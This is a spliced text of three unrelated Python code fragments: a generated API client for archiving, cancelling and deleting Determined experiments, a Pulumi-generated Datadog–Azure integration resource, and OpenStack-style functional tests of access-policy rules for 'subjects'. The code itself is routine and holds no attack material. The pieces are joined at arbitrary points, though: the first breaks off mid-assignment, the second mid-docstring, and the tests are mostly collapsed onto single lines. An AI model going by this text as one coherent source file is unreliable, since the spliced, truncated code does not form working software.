            post_params=form_params,
            files=local_var_files,
            response_type='V1ActivateExperimentResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def determined_archive_experiment(self, id, **kwargs):  # noqa: E501
        """Archive an experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_archive_experiment(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int id: The experiment id. (required)
        :return: V1ArchiveExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.determined_archive_experiment_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.determined_archive_experiment_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def determined_archive_experiment_with_http_info(self, id, **kwargs):  # noqa: E501
        """Archive an experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_archive_experiment_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int id: The experiment id. (required)
        :return: V1ArchiveExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method determined_archive_experiment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if ('id' not in params or
                params['id'] is None):
            raise ValueError("Missing the required parameter `id` when calling `determined_archive_experiment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['BearerToken']  # noqa: E501

        return self.api_client.call_api(
            '/api/v1/experiments/{id}/archive', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1ArchiveExperimentResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def determined_cancel_experiment(self, id, **kwargs):  # noqa: E501
        """Cancel an experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_cancel_experiment(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int id: The experiment id. (required)
        :return: V1CancelExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.determined_cancel_experiment_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.determined_cancel_experiment_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def determined_cancel_experiment_with_http_info(self, id, **kwargs):  # noqa: E501
        """Cancel an experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_cancel_experiment_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int id: The experiment id. (required)
        :return: V1CancelExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method determined_cancel_experiment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if ('id' not in params or
                params['id'] is None):
            raise ValueError("Missing the required parameter `id` when calling `determined_cancel_experiment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['BearerToken']  # noqa: E501

        return self.api_client.call_api(
            '/api/v1/experiments/{id}/cancel', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1CancelExperimentResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def determined_delete_experiment(self, experiment_id, **kwargs):  # noqa: E501
        """Delete the requested experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_delete_experiment(experiment_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int experiment_id: The ID of the experiment. (required)
        :return: V1DeleteExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.determined_delete_experiment_with_http_info(experiment_id, **kwargs)  # noqa: E501
        else:
            (data) = self.determined_delete_experiment_with_http_info(experiment_id, **kwargs)  # noqa: E501
            return data

    def determined_delete_experiment_with_http_info(self, experiment_id, **kwargs):  # noqa: E501
        """Delete the requested experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_delete_experiment_with_http_info(experiment_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int experiment_id: The ID of the experiment. (required)
        :return: V1DeleteExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['experiment_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method determined_delete_experiment" % key
                )
            params[key] =
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities

__all__ = ['IntegrationArgs', 'Integration']

@pulumi.input_type
class IntegrationArgs:
    def __init__(__self__, *,
                 client_id: pulumi.Input[str],
                 client_secret: pulumi.Input[str],
                 tenant_name: pulumi.Input[str],
                 automute: Optional[pulumi.Input[bool]] = None,
                 host_filters: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Integration resource.
        :param pulumi.Input[str] client_id: Your Azure web application ID.
        :param pulumi.Input[str] client_secret: (Required for Initial Creation) Your Azure web application secret key.
        :param pulumi.Input[str] tenant_name: Your Azure Active Directory ID.
        :param pulumi.Input[bool] automute: Silence monitors for expected Azure VM shutdowns.
        :param pulumi.Input[str] host_filters: String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red`
        """
        pulumi.set(__self__, "client_id", client_id)
        pulumi.set(__self__, "client_secret", client_secret)
        pulumi.set(__self__, "tenant_name", tenant_name)
        # Optional arguments are only recorded when explicitly provided.
        if automute is not None:
            pulumi.set(__self__, "automute", automute)
        if host_filters is not None:
            pulumi.set(__self__, "host_filters", host_filters)

    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> pulumi.Input[str]:
        """
        Your Azure web application ID.
        """
        return pulumi.get(self, "client_id")

    @client_id.setter
    def client_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "client_id", value)

    @property
    @pulumi.getter(name="clientSecret")
    def client_secret(self) -> pulumi.Input[str]:
        """
        (Required for Initial Creation) Your Azure web application secret key.
        """
        return pulumi.get(self, "client_secret")

    @client_secret.setter
    def client_secret(self, value: pulumi.Input[str]):
        pulumi.set(self, "client_secret", value)

    @property
    @pulumi.getter(name="tenantName")
    def tenant_name(self) -> pulumi.Input[str]:
        """
        Your Azure Active Directory ID.
        """
        return pulumi.get(self, "tenant_name")

    @tenant_name.setter
    def tenant_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "tenant_name", value)

    @property
    @pulumi.getter
    def automute(self) -> Optional[pulumi.Input[bool]]:
        """
        Silence monitors for expected Azure VM shutdowns.
        """
        return pulumi.get(self, "automute")

    @automute.setter
    def automute(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "automute", value)

    @property
    @pulumi.getter(name="hostFilters")
    def host_filters(self) -> Optional[pulumi.Input[str]]:
        """
        String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red`
        """
        return pulumi.get(self, "host_filters")

    @host_filters.setter
    def host_filters(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_filters", value)


@pulumi.input_type
class _IntegrationState:
    def __init__(__self__, *,
                 automute: Optional[pulumi.Input[bool]] = None,
                 client_id: Optional[pulumi.Input[str]] = None,
                 client_secret: Optional[pulumi.Input[str]] = None,
                 host_filters: Optional[pulumi.Input[str]] = None,
                 tenant_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Integration resources.
        :param pulumi.Input[bool] automute: Silence monitors for expected Azure VM shutdowns.
        :param pulumi.Input[str] client_id: Your Azure web application ID.
        :param pulumi.Input[str] client_secret: (Required for Initial Creation) Your Azure web application secret key.
        :param pulumi.Input[str] host_filters: String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red`
        :param pulumi.Input[str] tenant_name: Your Azure Active Directory ID.
        """
        # All state inputs are optional: only set what the caller provided.
        if automute is not None:
            pulumi.set(__self__, "automute", automute)
        if client_id is not None:
            pulumi.set(__self__, "client_id", client_id)
        if client_secret is not None:
            pulumi.set(__self__, "client_secret", client_secret)
        if host_filters is not None:
            pulumi.set(__self__, "host_filters", host_filters)
        if tenant_name is not None:
            pulumi.set(__self__, "tenant_name", tenant_name)

    @property
    @pulumi.getter
    def automute(self) -> Optional[pulumi.Input[bool]]:
        """
        Silence monitors for expected Azure VM shutdowns.
        """
        return pulumi.get(self, "automute")

    @automute.setter
    def automute(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "automute", value)

    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> Optional[pulumi.Input[str]]:
        """
        Your Azure web application ID.
        """
        return pulumi.get(self, "client_id")

    @client_id.setter
    def client_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_id", value)

    @property
    @pulumi.getter(name="clientSecret")
    def client_secret(self) -> Optional[pulumi.Input[str]]:
        """
        (Required for Initial Creation) Your Azure web application secret key.
        """
        return pulumi.get(self, "client_secret")

    @client_secret.setter
    def client_secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_secret", value)

    @property
    @pulumi.getter(name="hostFilters")
    def host_filters(self) -> Optional[pulumi.Input[str]]:
        """
        String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red`
        """
        return pulumi.get(self, "host_filters")

    @host_filters.setter
    def host_filters(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_filters", value)

    @property
    @pulumi.getter(name="tenantName")
    def tenant_name(self) -> Optional[pulumi.Input[str]]:
        """
        Your Azure Active Directory ID.
        """
        return pulumi.get(self, "tenant_name")

    @tenant_name.setter
    def tenant_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_name", value)


class Integration(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 automute: Optional[pulumi.Input[bool]] = None,
                 client_id: Optional[pulumi.Input[str]] = None,
                 client_secret: Optional[pulumi.Input[str]] = None,
                 host_filters: Optional[pulumi.Input[str]] = None,
                 tenant_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Datadog - Microsoft Azure integration resource. This can be used to create and manage the integrations.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_datadog as datadog

        # Create a new Datadog - Microsoft Azure integration
        sandbox = datadog.azure.Integration("sandbox",
            client_id="<azure_client_id>",
            client_secret="<azure_client_secret_key>",
            host_filters="examplefilter:true,example:true",
            tenant_name="<azure_tenant_name>")
        ```

        ## Import

        # Microsoft Azure integrations can be imported using their `tenant name` and `client` id separated with a colon (`:`).

        ```sh
         $ pulumi import datadog:azure/integration:Integration sandbox ${tenant_name}:${client_id}
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] automute: Silence monitors for expected Azure VM shutdowns.
        :param pulumi.Input[str] client_id: Your Azure web application ID.
        :param pulumi.Input[str] client_secret: (Required for Initial Creation) Your Azure web application secret key.
        :param pulumi.Input[str] host_filters: String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red`
        :param pulumi.Input[str] tenant_name: Your Azure Active Directory ID.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: IntegrationArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Datadog - Microsoft Azure integration resource. This can be used to create and manage the integrations.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_datadog as datadog

        # Create a new Datadog - Microsoft Azure integration
        sandbox = datadog.azure.Integration("sandbox",
            client_id="<azure_client_id>",
            client_secret="<azure_client_secret_key>",
            host_filters="examplefilter:true,example:true",
            tenant_name="<azure_tenant_name>")
        ```

        ## Import

        # Microsoft Azure integrations can be imported using their `tenant name` and `client` id separated with a colon (`:`).

        ```sh
         $ pulumi import datadog:azure/integration:Integration sandbox ${tenant_name}:${client_id}
        ```

        :param str resource_name: The name of the resource.
        :param IntegrationArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the (args-object) and (keyword-arguments) overloads.
        resource_args, opts = _utilities.get_resource_args_opts(IntegrationArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 automute: Optional[pulumi.Input[bool]] = None,
                 client_id: Optional[pulumi.Input[str]] = None,
                 client_secret: Optional[pulumi.Input[str]] = None,
                 host_filters: Optional[pulumi.Input[str]] = None,
                 tenant_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: required properties must be present
            # unless an URN is supplied (i.e. the engine already knows them).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = IntegrationArgs.__new__(IntegrationArgs)

            __props__.__dict__["automute"] = automute
            if client_id is None and not opts.urn:
                raise TypeError("Missing required property 'client_id'")
            __props__.__dict__["client_id"] = client_id
            if client_secret is None and not opts.urn:
                raise TypeError("Missing required property 'client_secret'")
            __props__.__dict__["client_secret"] = client_secret
            __props__.__dict__["host_filters"] = host_filters
            if tenant_name is None and not opts.urn:
                raise TypeError("Missing required property 'tenant_name'")
            __props__.__dict__["tenant_name"] = tenant_name
        super(Integration, __self__).__init__(
            'datadog:azure/integration:Integration',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            automute: Optional[pulumi.Input[bool]] = None,
            client_id: Optional[pulumi.Input[str]] = None,
            client_secret: Optional[pulumi.Input[str]] = None,
            host_filters: Optional[pulumi.Input[str]] = None,
            tenant_name: Optional[pulumi.Input[str]] = None) -> 'Integration':
        """
        Get an existing Integration resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] automute: Silence monitors for expected Azure
an subject should fail path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream'}) response = requests.get(path, headers=headers) self.assertEqual(403, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_download_subject_not_allowed_using_restricted_policy(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "", "upload_subject": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted" } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) # Create an subject path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'member'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Returned subject entity subject = jsonutils.loads(response.text) subject_id = subject['id'] expected_subject = { 'status': 'queued', 'name': 'subject-1', 'tags': [], 'visibility': 'private', 'self': '/v1/subjects/%s' % subject_id, 'protected': False, 'file': '/v1/subjects/%s/file' % subject_id, 'min_disk': 0, 'min_ram': 0, 'schema': '/v1/schemas/subject', } for key, value in six.iteritems(expected_subject): self.assertEqual(value, subject[key], key) # Upload data to subject path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 
'application/octet-stream'}) response = requests.put(path, headers=headers, data='ZZZZZ') self.assertEqual(204, response.status_code) # Get an subject should fail path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream', 'X-Roles': '_member_'}) response = requests.get(path, headers=headers) self.assertEqual(403, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_download_subject_allowed_using_restricted_policy(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted" } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) # Create an subject path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'member'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Returned subject entity subject = jsonutils.loads(response.text) subject_id = subject['id'] expected_subject = { 'status': 'queued', 'name': 'subject-1', 'tags': [], 'visibility': 'private', 'self': '/v1/subjects/%s' % subject_id, 'protected': False, 'file': '/v1/subjects/%s/file' % subject_id, 'min_disk': 0, 'min_ram': 0, 'schema': '/v1/schemas/subject', } for key, value in 
six.iteritems(expected_subject): self.assertEqual(value, subject[key], key) # Upload data to subject path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream'}) response = requests.put(path, headers=headers, data='ZZZZZ') self.assertEqual(204, response.status_code) # Get an subject should be allowed path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream', 'X-Roles': 'member'}) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_download_subject_raises_service_unavailable(self): """Test subject download returns HTTPServiceUnavailable.""" self.api_server.show_multiple_locations = True self.start_servers(**self.__dict__.copy()) # Create an subject path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get subject id subject = jsonutils.loads(response.text) subject_id = subject['id'] # Update subject locations via PATCH path = self._url('/v1/subjects/%s' % subject_id) media_type = 'application/openstack-subjects-v1.1-json-patch' headers = self._headers({'content-type': media_type}) http_server_pid, http_port = test_utils.start_http_server(subject_id, "subject-1") values = [{'url': 'http://127.0.0.1:%s/subject-1' % http_port, 'metadata': {'idx': '0'}}] doc = 
[{'op': 'replace', 'path': '/locations', 'value': values}] data = jsonutils.dumps(doc) response = requests.patch(path, headers=headers, data=data) self.assertEqual(200, response.status_code) # Download an subject should work path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/json'}) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) # Stop http server used to update subject location os.kill(http_server_pid, signal.SIGKILL) # Download an subject should raise HTTPServiceUnavailable path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/json'}) response = requests.get(path, headers=headers) self.assertEqual(503, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_subject_modification_works_for_owning_tenant_id(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "tenant:%(owner)s", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted" } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get the subject's ID 
def test_subject_modification_fails_on_mismatched_tenant_ids(self):
    """A tenant that does not match modify_subject's owner rule gets 403."""
    # modify_subject is keyed to a tenant id that can never match the caller.
    rules = {
        "context_is_admin": "role:admin",
        "default": "",
        "add_subject": "",
        "get_subject": "",
        "modify_subject": "'A-Fake-Tenant-Id':%(owner)s",
        "upload_subject": "",
        "get_subject_location": "",
        "delete_subject": "",
        "restricted": "not ('aki':%(container_format)s and role:_member_)",
        "download_subject": "role:admin or rule:restricted"
    }
    self.set_policy_rules(rules)
    self.start_servers(**self.__dict__.copy())

    # Create the subject as an admin.
    path = self._url('/v1/subjects')
    headers = self._headers({'content-type': 'application/json',
                             'X-Roles': 'admin'})
    payload = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki',
                               'container_format': 'aki'})
    resp = requests.post(path, headers=headers, data=payload)
    self.assertEqual(201, resp.status_code)

    # Get the subject's ID
    subject_id = jsonutils.loads(resp.text)['id']

    # Drop the admin role and attempt a rename; the owner check must fail.
    path = self._url('/v1/subjects/%s' % subject_id)
    media_type = 'application/openstack-subjects-v1.1-json-patch'
    headers['content-type'] = media_type
    del headers['X-Roles']
    patch = jsonutils.dumps([
        {'op': 'replace', 'path': '/name', 'value': 'new-name'},
    ])
    resp = requests.patch(path, headers=headers, data=patch)
    self.assertEqual(403, resp.status_code)
    self.stop_servers()
def test_subject_additions_works_only_for_specific_tenant_id(self):
    """add_subject pinned to TENANT1: creation succeeds for it, 403 otherwise."""
    rules = {
        "context_is_admin": "role:admin",
        "default": "",
        "add_subject": "'{0}':%(owner)s".format(TENANT1),
        "get_subject": "",
        "modify_subject": "",
        "upload_subject": "",
        "get_subject_location": "",
        "delete_subject": "",
        "restricted": "not ('aki':%(container_format)s and role:_member_)",
        "download_subject": "role:admin or rule:restricted",
        "add_member": "",
    }
    self.set_policy_rules(rules)
    self.start_servers(**self.__dict__.copy())

    path = self._url('/v1/subjects')
    headers = self._headers({'content-type': 'application/json',
                             'X-Roles': 'admin',
                             'X-Tenant-Id': TENANT1})
    payload = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki',
                               'container_format': 'aki'})

    # The whitelisted tenant may create subjects...
    resp = requests.post(path, headers=headers, data=payload)
    self.assertEqual(201, resp.status_code)

    # ...any other tenant is rejected by the same rule.
    headers['X-Tenant-Id'] = TENANT2
    resp = requests.post(path, headers=headers, data=payload)
    self.assertEqual(403, resp.status_code)
    self.stop_servers()
"role:admin", "default": "", "add_subject": "", "get_subject": "tenant:%(owner)s", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin', 'X-Tenant-Id': TENANT1}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Remove the admin role del headers['X-Roles'] # Get the subject's ID subject = jsonutils.loads(response.text) subject_id = subject['id'] # Can retrieve the subject as TENANT1 path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) # Can retrieve the subject's members as TENANT1 path = self._url('/v1/subjects/%s/members' % subject_id) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) headers['X-Tenant-Id'] = TENANT2 response = requests.get(path, headers=headers) self.assertEqual(403, response.status_code) self.stop_servers() def test_owning_tenant_can_publicize_subject(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "publicize_subject": "tenant:%(owner)s", "get_subject": "tenant:%(owner)s", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 
'X-Roles': 'admin', 'X-Tenant-Id': TENANT1}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get the subject's ID subject = jsonutils.loads(response.text) subject_id = subject['id'] path = self._url('/v1/subjects/%s' % subject_id) headers = self._headers({ 'Content-Type': 'application/openstack-subjects-v1.1-json-patch', 'X-Tenant-Id': TENANT1, }) doc = [{'op': 'replace', 'path': '/visibility', 'value': 'public'}] data = jsonutils.dumps(doc) response = requests.patch(path, headers=headers, data=data) self.assertEqual(200, response.status_code) def test_owning_tenant_can_delete_subject(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "publicize_subject": "tenant:%(owner)s", "get_subject": "tenant:%(owner)s", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin', 'X-Tenant-Id': TENANT1}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data)
